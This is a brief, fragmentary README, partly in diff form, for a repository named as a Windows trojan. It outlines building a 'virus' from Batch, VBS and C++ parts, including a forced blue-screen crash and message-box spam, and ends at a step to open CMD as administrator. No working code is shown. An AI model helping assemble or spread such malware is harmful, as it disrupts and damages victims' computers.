Arturzek/Trojan.Win32.WANTTODIE/README.md

 Batch

-Visual Basic Script (VBS)

 To build the virus in Visual Studio you must have https://drive.google.com/file/d/1JQe1erpH6BDPo3f6EdO_pVXnKxQ-WkA-/view?usp=sharing (the mp4 video)

-Build the BSOD and have Box Spam Compiled in the resources.

 Build BSOD in C++, just copy the main code.

-In the box spam follow the steps:
+In the box spam follow the steps(WE WILL NOT USE THIS YET):

 1.Open CMD as a administrator